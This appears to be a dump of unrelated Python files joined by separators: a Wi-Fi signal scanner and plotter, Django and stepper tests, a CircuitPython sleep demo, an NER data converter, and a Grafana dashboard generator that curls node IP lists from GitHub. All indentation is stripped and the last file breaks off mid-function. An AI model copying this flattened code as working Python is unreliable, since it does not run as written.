def __init__(self, show_extra_info=False, color=True):
self.ssid = None
self.bitrates = []
self.address = None
self.channel = None
self.encrypted = False
self.encryption_type = None
self.frequency = None
self.mode = None
self.quality = None
self.signal = None
self.noise = None
self.show_extra_info = show_extra_info
self.color = color
@property
def colour_coded_rssi(self):
"""
returns the colour coded rssi value
"""
return rssi_to_colour_str(self.signal)
def __repr__(self):
return 'Cell(ssid={ssid})'.format(**vars(self))
def __getitem__(self, index):
if self.color:
rssi = self.colour_coded_rssi
else:
rssi = self.signal
if self.show_extra_info:
ls = [self.ssid, self.address, rssi, self.frequency, self.quality, \
self.encryption_type, self.mode, self.channel]
else:
ls = [self.ssid, self.address, rssi]
return ls[index]
def scan(color=True, show_extra_info=False):
"""
Returns a list of all cells extracted from the output of iwlist.
"""
global LOADING_HANDLER, NAME_DICT
try:
iwlist_scan = subprocess.check_output(['iwlist', 'scan'],
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
raise InterfaceError(e.output.strip())
else:
iwlist_scan = iwlist_scan.decode('utf-8')
_normalize = lambda cell_string: normalize(cell_string, color, show_extra_info)
cells = [_normalize(i) for i in cells_re.split(iwlist_scan)[1:]]
# If there are no wifi signals confirm, if it's because the wifi is not enabled
if not len(cells):
_no_card = network_down_re.search(iwlist_scan)
if _no_card is not None:
raise AdapterUnaccessibleError("Cannot access Network Adapter, is your Wifi off?")
# terminate loader
if LOADING_HANDLER:
LOADING_HANDLER.terminate()
# update NAME_DICT
NAME_DICT.update({i.address: i.ssid for i in cells})
return cells
def normalize_key(key):
key = key.strip().lower()
key = key_translations.get(key, key)
return key.replace(' ', '')
normalize_value = {
'ssid': lambda v: v.strip('"'),
'encrypted': lambda v: v == 'on',
'address': identity,
'mode': identity,
'channel': int,
}
def split_on_colon(string):
key, _, value = map(lambda s: s.strip(), string.partition(':'))
return key, value
def normalize(cell_block, color, show_extra_info=False):
# The cell blocks come in with every line except the first indented at
# least 20 spaces. This removes the first 20 spaces off of those lines.
lines = textwrap.dedent(' ' * 20 + cell_block).splitlines()
cell = Cell(show_extra_info=show_extra_info, color=color)
while lines:
line = lines.pop(0)
if line.startswith('Quality'):
for re_name, quality_re in quality_re_dict.items():
match_result = quality_re.search(line)
if match_result is not None:
groups = match_result.groupdict()
cell.quality = groups['quality']
signal = groups['siglevel']
noise = groups.get('noiselevel')
if re_name == 'relative':
actual, total = map(int, signal.split('/'))
cell.signal = db2dbm(int((actual / total) * 100))
elif re_name == 'absolute':
cell.quality = cell.quality + '/100'
cell.signal = db2dbm(int(signal))
else:
cell.signal = int(signal)
if noise is not None:
cell.noise = int(noise)
break
elif line.startswith('Bit Rates'):
values = split_on_colon(line)[1].split('; ')
# consume next line of bit rates, because they are split on
# different lines, sometimes...
if lines:
while lines[0].startswith(' ' * 10):
values += lines.pop(0).strip().split('; ')
cell.bitrates.extend(values)
elif ':' in line:
key, value = split_on_colon(line)
key = normalize_key(key)
if key == 'ie':
if 'Unknown' in value:
continue
# consume remaining block
values = [value]
while lines and lines[0].startswith(' ' * 4):
values.append(lines.pop(0).strip())
if 'WPA2' in value:
cell.encryption_type = 'wpa2'
elif 'WPA' in value:
cell.encryption_type = 'wpa'
else:
cell.encryption_type = 'null'
if key == 'frequency':
matches = frequency_re.search(value)
cell.frequency = matches.group('frequency')
if matches.group('channel'):
cell.channel = int(matches.group('channel'))
elif key in normalize_value:
setattr(cell, key, normalize_value[key](value))
# It seems that encryption types other than WEP need to specify their
# existence.
if cell.encrypted and not cell.encryption_type:
cell.encryption_type = 'wep'
return cell
def animate(i, ax, plt, xs, val_dict, _show_extra_info, headers):
"""
animate a real time graph plot of RSSI against time
"""
global NAME_DICT
xs.append(float(dt.datetime.now().strftime("%H.%M%S")))
_signals = scan(_show_extra_info)
show_header("WIFI")
print(tabulate(_signals, headers=headers))
print("\n\n")
for i in _signals:
# check for dict key if it exists and append
try:
# if signal is not None
if i.signal:
val_dict[i.address].append(i.signal)
else:
val_dict[i].append([np.random.random_integers(*OUT_OF_RANGE)])
except:
# create new list with prior values out of range
val_dict[i.address] = list()
val_dict[i.address].extend([np.random.random_integers(*OUT_OF_RANGE) \
for i in range(len(xs))])
ax.clear()
# limit both axis to VALUES_PER_FRAME values at a time maximum
xs = xs[-VALUES_PER_FRAME:]
for i in val_dict:
device_name = NAME_DICT[i]
val_dict[i] = val_dict[i][-VALUES_PER_FRAME:]
# if device has dissapeared, append OUT_OF_RANGE to make up length
if len(val_dict[i]) < len(xs):
val_dict[i].extend([np.random.random_integers(*OUT_OF_RANGE) \
for i in range(len(xs) - len(val_dict[i]))])
# if y axis detects twice
if len(xs) < len(val_dict[i]):
val_dict[i] = val_dict[i][-len(xs):]
# smoothen out x axis before display
x = np.array(xs)
y = np.array(val_dict[i])
x_new = np.linspace(x.min(), x.max(), 500)
# check if points are enough to interpolate on and use box(nearest) interpolation
# to display levels to this
if len(x) > 2:
f = interp1d(x, y, kind='nearest')
y_smooth = f(x_new)
# plot smooth plot with scatter point plots
ax.plot(x_new, y_smooth, label=device_name)
else:
ax.plot(xs, y, label=device_name)
# ax.scatter(xs, y)
# display legend, attempt to supress warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
ax.legend()
plt.xticks([])
plt.ylim(-100, 0)
plt.title("Wifi Devices RSSI against time")
plt.ylabel("Wifi RSSI")
plt.xlabel("Time")
def wifilyze(**kwargs):
""" Display wifi analyzed details"""
global LOADING_HANDLER
_show_graph = kwargs.pop("graph")
_show_extra_info = kwargs.pop("show_extra_info")
_analyze_all = kwargs.pop("analyze_all")
_color = kwargs.get("color", True)
headers = ["Name", "MAC Address", "RSSI"]
if _show_extra_info:
headers.extend(["Frequency", "Quality", "Encryption Type", "Mode of Device", "Channel"])
if _analyze_all:
# return _signals and headers of wifi tables if analyze all
_signals = scan(_color, _show_extra_info)
return ((_signals, headers))
else:
try:
LOADING_HANDLER = spin(
before="Initializing ",
after="\nScanning for Wifi Devices")
if _show_graph:
_signals = scan(_show_extra_info)
show_header("WIFI")
print(tabulate(_signals, headers=headers, disable_numparse=True))
print("\n\n")
x = []
val_dict = {i.address: list() for i in scan(_show_extra_info)}
realtimehandler = RealTimePlot(
func=animate,
func_args=(x, val_dict, _show_extra_info, headers)
)
realtimehandler.animate()
else:
while True:
_signals = scan(_show_extra_info)
if not bool(_signals):
LOADING_HANDLER = spin(before="No Devices found ")
else:
show_header("WIFI")
print(tabulate(_signals, headers=headers, disable_numparse=True))
print("\n\n")
except AdapterUnaccessibleError as e:
LOADING_HANDLER.terminate()
show_header("WIFI")
print(e)
sys.exit(1)
|
457257
|
import pytest
pytestmark = [
pytest.mark.django_db,
pytest.mark.freeze_time('2032-12-01 16:20'),
]
@pytest.fixture(autouse=True)
def material(course, mixer):
return mixer.blend('notion.Material', course=course, is_home_page=True, page_id='deadbeef')
@pytest.fixture
def another_material(course, mixer, freezer):
freezer.move_to('2032-12-01 16:40') # 20 minutes later
return mixer.blend('notion.Material', course=course, is_home_page=True, page_id='beef')
def test_slug(api):
got = api.get('/api/v2/studies/purchased/')['results']
assert got[0]['home_page_slug'] == 'deadbeef'
@pytest.mark.usefixtures('another_material')
def test_latest_material_is_used(api):
got = api.get('/api/v2/studies/purchased/')['results']
assert got[0]['home_page_slug'] == 'beef'
def test_material_without_home_page_flag_is_ignored(api, material):
material.setattr_and_save('is_home_page', False)
got = api.get('/api/v2/studies/purchased/')['results']
assert got[0]['home_page_slug'] is None
|
457282
|
import alarm
import board
import time
import digitalio
import neopixel
## WAKING PINS - uncomment appropriate pin per microcontroller
wake_pin = board.X1 # STM32F4 Pyboard
# wake_pin = board.GP0 # RP2040 Pico
# wake_pin = board.A4 # NRF52840 Feather
# wake_pin = board.IO5 # ESP32-S2 Saola
## LED - use on RP2040 Pico, STM32F4 Pyboard
## PinAlarms blink 1x, TimeAlarms 2x, Startup 3x
led_pin = board.LED
led = digitalio.DigitalInOut(led_pin)
led.direction = digitalio.Direction.OUTPUT
def blink(num_blinks):
for i in range(num_blinks):
led.value = True
time.sleep(0.2)
led.value = False
time.sleep(0.2)
def show_timealarm():
blink(2)
def show_pinalarm():
blink(1)
def show_noalarm():
blink(3)
## Comment out above if using Neopixel
## NEOPIXEL - use on Circuitplayground Bluefruit, ESP32-S2 Saola
## TimeAlarms are red, PinAlarms are blue, Default is white
# np = neopixel.NeoPixel(board.NEOPIXEL, 1)
# def show_timealarm():
# np[0] = (50, 0, 0)
# time.sleep(1)
# np[0] = (0, 0, 0)
# def show_pinalarm():
# np[0] = (0, 0, 50)
# time.sleep(1)
# np[0] = (0, 0, 0)
# def show_noalarm():
# np[0] = (50, 50, 50)
# time.sleep(1)
# np[0] = (0, 0, 0)
## Comment out above if using LED
## Show which alarm woke the chip
print("Wake alarm:")
print(alarm.wake_alarm)
if isinstance(alarm.wake_alarm, alarm.time.TimeAlarm):
show_timealarm()
elif isinstance(alarm.wake_alarm, alarm.pin.PinAlarm):
show_pinalarm()
else:
show_noalarm()
## USB enumeration may take 4-5s per restart
time_alarm = alarm.time.TimeAlarm(monotonic_time=time.monotonic() + 10)
## Deep sleep pin alarms may only accept a single configuration.
pin_alarm = alarm.pin.PinAlarm(
pin=wake_pin, value=True, edge=True, pull=True
) # STM32 must be this exact config
# pin_alarm = alarm.pin.PinAlarm(pin=wake_pin, value=False, edge=False, pull=True) # NRF and ESP32S2 must use level, not edge
# pin_alarm = alarm.pin.PinAlarm(pin=wake_pin, value=False, edge=True, pull=True) # RP2040 supports any config
alarm.exit_and_deep_sleep_until_alarms(time_alarm, pin_alarm)
# alarm.exit_and_deep_sleep_until_alarms(pin_alarm) # Using TimeAlarm will reduce performance on the RP2040
# alarm.exit_and_deep_sleep_until_alarms(time_alarm) # Using PinAlarm will reduce performance on the ESP32-S2
|
457284
|
import sys
import os
import dk
import gc
from .mainframe import MainFrame
class App(dk.App):
''' 응용 프로그램 인스턴스 (dk.App)'''
def onInit(self):
self.resourceDir = os.path.abspath(os.path.join( os.path.dirname(__file__), 'resources' ))
print('resourceDir: ', self.resourceDir)
displayBounds = self.displayBounds(0)
contentBounds = self.screenContentBounds(0)
print('displayBounds: ', displayBounds)
print('contentBounds: ', contentBounds)
platform = dk.platform()
contentSize = dk.Size(1024, 768)
if 'ios' in platform or 'android' in platform:
contentSize = dk.Size(contentBounds.size)
else:
if contentSize.width > contentBounds.width:
contentSize.width = contentBounds.width
if contentSize.height > contentBounds.height:
contentSize.height = contentBounds.height
print('main screen resolution: ', contentSize)
window = dk.Window('editor', contentSize)
screen = dk.Screen(window, MainFrame())
if not screen:
print('screen error!?')
self.terminate(2)
else:
self.screen = screen
self.screen.activeFrameLatency = 0
self.screen.inactiveFrameLatency = 0
self.screen.window.activate()
pass
def onExit(self):
if hasattr(self, 'screen'):
self.screen.terminate(True)
self.screen = None
gc.collect()
if __name__ == '__main__':
App().run()
|
457290
|
from utils.basic_utils import load_json, save_json
def combine(video_name_split_path, video_duration_path, save_path):
video_name_split = load_json(video_name_split_path)
video_duration_dict = load_json(video_duration_path)
combined_dict = {}
for split_name, split_video_names in video_name_split.items():
combined_dict[split_name] = {vid_name: video_duration_dict[vid_name]
for vid_name in split_video_names}
save_json(combined_dict, save_path)
if __name__ == '__main__':
import sys
combine(*sys.argv[1:])
|
457359
|
from navycut.utils.server import create_asgi_app
from os import environ
# Asynchronus server gateway interface
# use uvicorn asgi server to run this app
#define your default settings file here:
environ.setdefault("NAVYCUT_SETTINGS_MODULE", "check1.settings")
application = create_asgi_app()
|
457388
|
import os
from argparse import ArgumentParser
import random
def read_ner(path):
data = [[]]
with open(path, encoding='ISO-8859-1') as f:
for line in f:
line = line.strip()
# New sentence
if len(line) == 0:
if len(data[-1]) > 0:
data.append([])
continue
if line == '-DOCSTART- -DOCSTART- O':
continue
# Add token to sentence
tok, _, label = line.split()
label = label[0] + label[1:].lower()
data[-1].append((tok, label))
if len(data[-1]) == 0:
del data[-1]
return data
def prepare_ner(conll_path):
train_path = os.path.join(conll_path, 'ned.train')
dev_path = os.path.join(conll_path, 'ned.testa')
test_path = os.path.join(conll_path, 'ned.testb')
train = read_ner(train_path)
dev = read_ner(dev_path)
test = read_ner(test_path)
return train, dev, test
def write_tsv(path, data):
label_counts = {}
with open(path, 'w') as f:
for sent in data:
for tok, label in sent:
if label not in label_counts:
label_counts[label] = 0
label_counts[label] += 1
f.write('{}\t{}\n'.format(tok, label))
f.write('\n')
print('Labels in {} ({} labels):'.format(path, len(label_counts)))
total = sum(label_counts.values())
for label in sorted(label_counts, key=label_counts.get, reverse=True):
count = label_counts[label]
print('{:10} {:>8} ({:.2f}%)'.format(label, count, count / total * 100))
print('')
def save_data(data, out_path):
if len(data) == 0:
print('No data found')
return
os.makedirs(os.path.join(out_path, 'ner'))
train, dev, test = data
# Write to files
write_tsv(os.path.join(out_path, 'ner', 'train.tsv'), train)
write_tsv(os.path.join(out_path, 'ner', 'dev.tsv'), dev)
write_tsv(os.path.join(out_path, 'ner', 'test.tsv'), test)
total = len(train) + len(dev) + len(test)
print('NER: Train={:.2f}, Dev={:.2f}, Test={:.2f}'.format(len(train) / total, len(dev) / total, len(test) / total))
def main():
parser = ArgumentParser(description='Process some integers.')
parser.add_argument("-i", dest="in_path", required=True, help="Path to CoNLL-2002 NER data", metavar="FILE")
parser.add_argument("-o", dest="out_path", default='conll2002', help="Target location", metavar="FILE")
parser.add_argument("--seed", dest="seed", default=6544, help="Random seed")
args = parser.parse_args()
if not os.path.exists(args.in_path):
print('provide a valid input path')
return
if os.path.exists(args.out_path):
print('output path already exists')
return
random.seed(args.seed)
print(' > Preparing NER data')
save_data(prepare_ner(args.in_path), args.out_path)
if __name__ == '__main__':
main()
|
457391
|
import json
from os.path import expanduser
class RenderEnvironment():
def __init__(self):
self.queueName = None
self.largeDiskQueueName = None
self.jobDefinition = None
self.sourceBucket = None
self.resultsBucket = None
def validate(self):
if self.queueName is None:
raise Exception('Queue name not set.')
if self.largeDiskQueueName is None:
raise Exception('Large disk queue name not set.')
if self.jobDefinition is None:
raise Exception('Job definition not set.')
if self.sourceBucket is None:
raise Exception('Source bucket not set.')
if self.resultsBucket is None:
raise Exception('Results bucket not set.')
@classmethod
def load(cls, path=None):
with open(cls._get_path(path), 'r') as f:
text = f.read()
obj = json.loads(text)
return RenderEnvironment._from_dict(obj)
@classmethod
def _from_dict(cls, obj):
env = RenderEnvironment()
env.queueName = obj['queueName']
env.largeDiskQueueName = obj['largeDiskQueueName']
env.jobDefinition = obj['jobDefinition']
env.sourceBucket = obj['sourceBucket']
env.resultsBucket = obj['resultsBucket']
return env
@classmethod
def from_stack_outputs(cls, outputs):
env = RenderEnvironment()
env.queueName = RenderEnvironment._after_last_slash(outputs['RenderJobQueue'])
env.largeDiskQueueName = RenderEnvironment._after_last_slash(outputs['LargeDiskRenderJobQueue'])
env.jobDefinition = RenderEnvironment._after_last_slash(outputs['RenderJobDefinition'])
env.sourceBucket = outputs['SourceBucket']
env.resultsBucket = outputs['ResultsBucket']
return env
@classmethod
def _after_last_slash(cls, string):
index = string.rfind('/')
if index <= 0:
return string
else:
return string[index + 1:]
def save(self, path=None):
text = json.dumps(self._to_dict())
with open(self._get_path(path), 'w') as f:
f.write(text)
def _to_dict(self):
return {
'queueName': self.queueName,
'largeDiskQueueName': self.largeDiskQueueName,
'jobDefinition': self.jobDefinition,
'sourceBucket': self.sourceBucket,
'resultsBucket': self.resultsBucket
}
@classmethod
def _get_path(cls, specified_path):
if specified_path:
return specified_path
else:
return expanduser('~/.renderconfig')
|
457409
|
import pytest
from cx_const import Number, StepperDir
from cx_core.stepper import MinMax, Stepper, StepperOutput
class FakeStepper(Stepper):
def __init__(self) -> None:
super().__init__(MinMax(0, 1), 1)
def step(self, value: Number, direction: str) -> StepperOutput:
return StepperOutput(next_value=0, next_direction=None)
@pytest.mark.parametrize(
"direction_input, previous_direction, expected_direction",
[
(StepperDir.UP, StepperDir.UP, StepperDir.UP),
(StepperDir.DOWN, StepperDir.DOWN, StepperDir.DOWN),
(StepperDir.UP, StepperDir.DOWN, StepperDir.UP),
(StepperDir.DOWN, StepperDir.UP, StepperDir.DOWN),
(StepperDir.TOGGLE, StepperDir.UP, StepperDir.DOWN),
(StepperDir.TOGGLE, StepperDir.DOWN, StepperDir.UP),
],
)
def test_get_direction(
direction_input: str, previous_direction: str, expected_direction: str
) -> None:
stepper = FakeStepper()
stepper.previous_direction = previous_direction
direction_output = stepper.get_direction(0, direction_input)
assert direction_output == expected_direction
@pytest.mark.parametrize(
"direction_input, expected_sign",
[
(StepperDir.UP, 1),
(StepperDir.DOWN, -1),
(StepperDir.UP, 1),
(StepperDir.DOWN, -1),
],
)
def test_sign(direction_input: str, expected_sign: int) -> None:
stepper = FakeStepper()
sign_output = stepper.sign(direction_input)
assert sign_output == expected_sign
|
457411
|
import os
import json
import copy
import subprocess
from dotenv import load_dotenv, find_dotenv
import yaml
import logging
import argparse
import requests
# grafana api host
grafana_api_host = "https://monitor.harmony.one/api/"
# set shard count
shard_count = 4
# min storage space for alerting
min_storage_space = 5
# max actual usage memory rate for alerting
max_actual_usage_memory_rate = 80
# scrape_interval for every shard in prometheus
prometheus_scrape_interval = 5
# this grafana folder id dict for mode
dict_grafana_folder_mode = {
"mainnet": 18,
"ostn": 19,
"stn": 20,
"test": 31,
"lrtn": 45,
"pstn": 46,
"dryrun": 52,
"testnet": 105
}
do_node_ips = []
service_list = ['bridge', 'graph', 'multisig', 'contractverify', 'explorerv2']
def shcmd(cmd, ignore_error=False):
ret = subprocess.call(cmd, shell=True)
if ignore_error is False and ret != 0:
raise RuntimeError("Failed to execute {}. Return code:{}".format(
cmd, ret))
return ret
# get latest node ips from github
def download_ip_list_from_github(git_token, mode):
github_dir = mode
# download list of IP from shard
for index in range(shard_count):
url_path = "https://raw.githubusercontent.com/harmony-one/nodedb/" \
"master/{github_dir}/shard{shard_index}.txt".format(shard_index=index, github_dir=github_dir)
cmd = "curl -H 'Authorization: token {token}' " \
"-H 'Accept: application/vnd.github.v3.raw' -o ips/{mode}/shard{shard_index}.txt " \
"{path}".format(token=git_token, shard_index=index, path=url_path, mode=mode)
shcmd(cmd)
if mode == "mainnet":
# download list of DNS IP from shard
for index in range(shard_count):
url_path = "https://raw.githubusercontent.com/harmony-one/nodedb/" \
"master/{github_dir}/dns.shard{shard_index}.txt".format(shard_index=index, github_dir=github_dir)
cmd = "curl -H 'Authorization: token {token}' " \
"-H 'Accept: application/vnd.github.v3.raw' -o ips/{mode}/dns.shard{shard_index}.txt " \
"{path}".format(token=git_token, shard_index=index, path=url_path, mode=mode)
shcmd(cmd)
# download list of EXP IP from shard
for index in range(shard_count):
url_path = "https://raw.githubusercontent.com/harmony-one/nodedb/" \
"master/{github_dir}/shard{shard_index}exp.txt".format(shard_index=index, github_dir=github_dir)
cmd = "curl -H 'Authorization: token {token}' " \
"-H 'Accept: application/vnd.github.v3.raw' -o ips/{mode}/exp.shard{shard_index}.txt " \
"{path}".format(token=git_token, shard_index=index, path=url_path, mode=mode)
shcmd(cmd)
# download list of services
for service in service_list:
url_path = "https://raw.githubusercontent.com/harmony-one/nodedb/" \
"master/{github_dir}/services/{service_name}.txt".format(service_name=service,
github_dir=github_dir)
cmd = "curl -H 'Authorization: token {token}' " \
"-H 'Accept: application/vnd.github.v3.raw' -o ips/{mode}/services/{service_name}.txt " \
"{path}".format(token=git_token, service_name=service, path=url_path, mode=mode)
shcmd(cmd)
# download list of DO node
url_path = "https://raw.githubusercontent.com/harmony-one/nodedb/" \
"master/mainnet/shard/do.{mode}.nodes.txt"
cmd = "curl -H 'Authorization: token {token}' " \
"-H 'Accept: application/vnd.github.v3.raw' -o ips/{mode}/do.{mode}.nodes.txt " \
"{path}".format(token=git_token, path=url_path, mode=mode)
shcmd(cmd)
def load_file_to_json(json_file):
with open(json_file) as f_db_shard:
return json.load(f_db_shard)
def load_file_to_yaml(yaml_file):
with open(yaml_file) as f_db_shard:
return yaml.load(f_db_shard, Loader=yaml.FullLoader)
def load_file_to_array(txt_file):
ip_array = []
with open(txt_file) as f_file:
for line in f_file:
ip_array.append(line.rstrip())
return ip_array
def load_file_split_to_array(txt_file):
ip_array = []
with open(txt_file) as f_file:
for line in f_file:
ip_array.extend(line.rstrip().split(" "))
return ip_array
# create grafana whole config file for network node
def create_network_node_grafana_config(mode, category, dict_ip_array, dict_dns_ip_array,
shard_dashboard_template_json, dict_part_temp_json):
dict_shard_dashboard_json = {}
# create network nodes
for ind in range(shard_count):
ip_array = {"dns": [], "node": []}
ip_created = []
if mode == "mainnet":
# load dns and exp ip list
ip_array["dns"] = dict_dns_ip_array.get(ind)
all_ip_array = dict_ip_array.get(ind)
for ip in all_ip_array:
if ip in ip_array["dns"]:
continue
else:
ip_array["node"].append(ip)
else:
ip_array["node"] = dict_ip_array.get(ind)
# special job name
if mode == "test":
job_name = "shard0_mainnet"
else:
job_name = "shard{shard_index}_{mode}".format(shard_index=ind, mode=mode)
shard_dashboard_json = copy.deepcopy(shard_dashboard_template_json)
# modify dashboard uid
shard_dashboard_json["uid"] = "{mode}_shard{shard_index}_{category}".format(mode=mode, shard_index=ind,
category=category)
# modify dashboard title
shard_dashboard_json["title"] = "{mode} - {category} - SHARD {shard_index}".format(
mode=mode.upper(), category=category.upper(), shard_index=ind)
# modify global stat
shard_dashboard_json["panels"][2]["targets"][0].update(
{"expr": "count(up{{job=\"{shard}\"}}==1)".format(shard=job_name)})
shard_dashboard_json["panels"][3]["targets"][0].update(
{"expr": "up{{job=\"{shard}\"}}==0".format(shard=job_name)})
shard_dashboard_json["panels"][3]["targets"][1].update(
{"expr": "count(up{{job=\"{shard}\"}}==0)".format(shard=job_name)})
id_0 = 10
y_point = 10
for node_type in ip_array:
ips = ip_array[node_type]
# skip the empty node set
if not len(ips):
continue
# add row panel
id_0 += 2
row_panel = {
"collapsed": True,
"datasource": "null",
"gridPos": {"h": 1, "w": 24, "x": 0, "y": y_point},
"id": id_0,
"panels": [],
"title": node_type.upper(),
"type": "row"
}
y_point += 1
ips_size = len(ips)
for idx in range(ips_size):
ip = ips[idx].rstrip()
if ip == "" or ip in ip_created:
continue
if category == "base":
for part_index in range(4):
id_0 += 2
x_point = part_index * 6
# create panel for base metric
data_part_json = create_grafana_base_panel_config(mode, ind, ip, part_index, job_name,
dict_part_temp_json)
data_part_json.update({"gridPos": {'h': 6, 'w': 6, 'x': x_point, 'y': y_point},
"id": id_0
})
# insert this chart to dashboard.panels
row_panel["panels"].append(data_part_json)
elif category == "network":
for part_index in range(2):
id_0 += 2
x_point = part_index * 12
# create panel for network metric
data_part_json = create_grafana_network_panel_config(mode, ind, ip, part_index, job_name,
dict_part_temp_json)
data_part_json.update({"gridPos": {'h': 6, 'w': 12, 'x': x_point, 'y': y_point},
"id": id_0
})
# insert this chart to dashboard.panels
row_panel["panels"].append(data_part_json)
y_point += 6
# record created ip to avoid create duplicate
ip_created.append(ip)
if node_type == "dns":
# auto collapse row for dns
row_panel_child = row_panel["panels"]
row_panel["panels"] = []
row_panel["collapsed"] = False
shard_dashboard_json["panels"].append(row_panel)
shard_dashboard_json["panels"].extend(row_panel_child)
else:
shard_dashboard_json["panels"].append(row_panel)
dict_shard_dashboard_json[ind] = shard_dashboard_json
return dict_shard_dashboard_json
# create grafana whole config file for service node
def create_service_grafana_config(mode, category, dict_service_ip_array,
service_dashboard_template_json, dict_part_temp_json):
job_name = "service_{mode}".format(mode=mode)
service_dashboard_json = copy.deepcopy(service_dashboard_template_json)
# modify dashboard uid
service_dashboard_json["uid"] = "{mode}_service_{category}".format(mode=mode, category=category)
# modify dashboard title
service_dashboard_json["title"] = "{mode} - {category} - SERVICE".format(
mode=mode.upper(), category=category.upper())
# modify global stat
service_dashboard_json["panels"][2]["targets"][0].update(
{"expr": "count(up{{job=\"{job_name}\"}}==1)".format(job_name=job_name)})
service_dashboard_json["panels"][3]["targets"][0].update(
{"expr": "up{{job=\"{job_name}\"}}==0".format(job_name=job_name)})
service_dashboard_json["panels"][3]["targets"][1].update(
{"expr": "count(up{{job=\"{job_name}\"}}==0)".format(job_name=job_name)})
id_0 = 10
y_point = 10
ip_created = []
for node_type in dict_service_ip_array:
ips = dict_service_ip_array[node_type]
# skip the empty node set
if not len(ips):
continue
# add row panel
id_0 += 2
row_panel = {
"collapsed": True,
"datasource": "null",
"gridPos": {"h": 1, "w": 24, "x": 0, "y": y_point},
"id": id_0,
"panels": [],
"title": node_type.upper(),
"type": "row"
}
y_point += 1
ips_size = len(ips)
for idx in range(ips_size):
ip = ips[idx].rstrip()
if ip == "" or ip in ip_created:
continue
if category == "base":
for part_index in range(4):
id_0 += 2
x_point = part_index * 6
# create panel for base metric
data_part_json = create_grafana_base_panel_config(mode, "service", ip, part_index, job_name,
dict_part_temp_json)
data_part_json.update({"gridPos": {'h': 6, 'w': 6, 'x': x_point, 'y': y_point},
"id": id_0
})
# insert this chart to dashboard.panels
row_panel["panels"].append(data_part_json)
elif category == "network":
for part_index in range(2):
id_0 += 2
x_point = part_index * 12
# create panel for network metric
data_part_json = create_grafana_network_panel_config(mode, "service", ip, part_index, job_name,
dict_part_temp_json)
data_part_json.update({"gridPos": {'h': 6, 'w': 12, 'x': x_point, 'y': y_point},
"id": id_0
})
# insert this chart to dashboard.panels
row_panel["panels"].append(data_part_json)
y_point += 6
# record created ip to avoid create duplicate
ip_created.append(ip)
if node_type == "bridge":
# auto collapse row for bridge
row_panel_child = row_panel["panels"]
row_panel["panels"] = []
row_panel["collapsed"] = False
service_dashboard_json["panels"].append(row_panel)
service_dashboard_json["panels"].extend(row_panel_child)
else:
service_dashboard_json["panels"].append(row_panel)
return service_dashboard_json
# create grafana base metric config file
def create_grafana_base_panel_config(mode, ind, ip, part_index, job_name, dict_part_temp_json):
data_part_json = {}
title_chart = ""
# FIRST COLUMN - CPU Monitoring
if part_index == 0:
# load cpu metric template
data_part_json = copy.deepcopy(dict_part_temp_json["cpu"])
# add an alert for CPU
if ind == "service":
data_part_json["alert"][
"message"] = "the cpu usage rate of the {mode} service node({ip}) is abnormal".format(
mode=mode, ip=ip)
else:
data_part_json["alert"][
"message"] = "the cpu usage rate of the {mode} shard{shard_index} node({ip}) is abnormal".format(
mode=mode, shard_index=ind, ip=ip)
# no need alert network
if mode not in ["mainnet"]:
data_part_json["alert"]["notifications"] = []
cpu_query = "100 - (avg by (instance) (irate(node_cpu_seconds_total{{instance=\"{ip}:9100\", job=\"{job_name}\",mode=\"idle\"}}[5m])) * 100)".format(
ip=ip, job_name=job_name)
title_chart = "CPU UTILIZATION - "
data_part_json["targets"][0].update({"expr": cpu_query})
# SECOND COLUMN - RAM Monitoring
elif part_index == 1:
# load ram metric template
data_part_json = copy.deepcopy(dict_part_temp_json["ram"])
# add an alert for Memory
if ind == "service":
data_part_json["alert"][
"message"] = "the memory usage rate of the {mode} service node({ip}) is abnormal".format(
mode=mode, ip=ip)
else:
data_part_json["alert"][
"message"] = "the memory usage rate of the {mode} shard{shard_index} node({ip}) is abnormal".format(
mode=mode, shard_index=ind, ip=ip)
# no need alert network
if mode not in ["mainnet"]:
data_part_json["alert"]["notifications"] = []
ram_query = "(node_memory_MemTotal_bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}} - node_memory_" \
"MemFree_bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}}) / node_memory_MemTotal_" \
"bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}} * 100".format(ip=ip, job_name=job_name)
ram_actual_usage_query = "(node_memory_MemTotal_bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}} - node_memory_" \
"MemAvailable_bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}}) * 100 / node_memory_" \
"MemTotal_bytes{{instance=\"{ip}:9100\",job=\"{job_name}\"}}".format(ip=ip,
job_name=job_name)
title_chart = "MEMORY - "
data_part_json["targets"][0].update({"expr": ram_query})
data_part_json["targets"][1].update({"expr": ram_actual_usage_query})
# THIRD COLUMN - DISK Monitoring
elif part_index == 2:
# load disk metric template
data_part_json = copy.deepcopy(dict_part_temp_json["disk"])
# add an alert for storage
if ind == "service":
data_part_json["alert"][
"message"] = "the free space of the {mode} service node({ip}) abnormal".format(
mode=mode, ip=ip)
else:
data_part_json["alert"][
"message"] = "the free space of the {mode} shard{shard_index} node({ip}) abnormal".format(
mode=mode, shard_index=ind, ip=ip)
# no need alert network
if mode not in ["mainnet"]:
data_part_json["alert"]["notifications"] = []
# disk_query = "node_filesystem_avail_bytes{{instance=\"{ip}:9100\", job=\"{job_name}\", mountpoint=\"/\"}}/1024/1024/1024"
if ip in do_node_ips:
disk_query = "(1-(node_filesystem_avail_bytes{{instance=\"{ip}:9100\", job=\"{job_name}\", " \
"device=\"/dev/sda\", fstype=~\"ext4|xfs\"}} / node_filesystem_size_bytes{{instance=\"{ip}:9100\", " \
"job=\"{job_name}\", device=\"/dev/sda\", fstype=~\"ext4|xfs\"}} )) * 100".format(ip=ip,
job_name=job_name)
else:
disk_query = "(1-(node_filesystem_avail_bytes{{instance=\"{ip}:9100\", job=\"{job_name}\", " \
"fstype=~\"ext4|xfs\"}} / node_filesystem_size_bytes{{instance=\"{ip}:9100\", " \
"job=\"{job_name}\", fstype=~\"ext4|xfs\"}} )) * 100".format(ip=ip, job_name=job_name)
title_chart = "DISK SPACE - "
data_part_json["targets"][0].update({"expr": disk_query})
# FOURTH COLUMN - DISK IO Monitoring
elif part_index == 3:
# load io metric template
data_part_json = copy.deepcopy(dict_part_temp_json["io"])
io_read_query = "irate(node_disk_reads_completed_total{{instance=\"{ip}:9100\", job=\"{job_name}\"}}[5m])".format(
ip=ip, job_name=job_name)
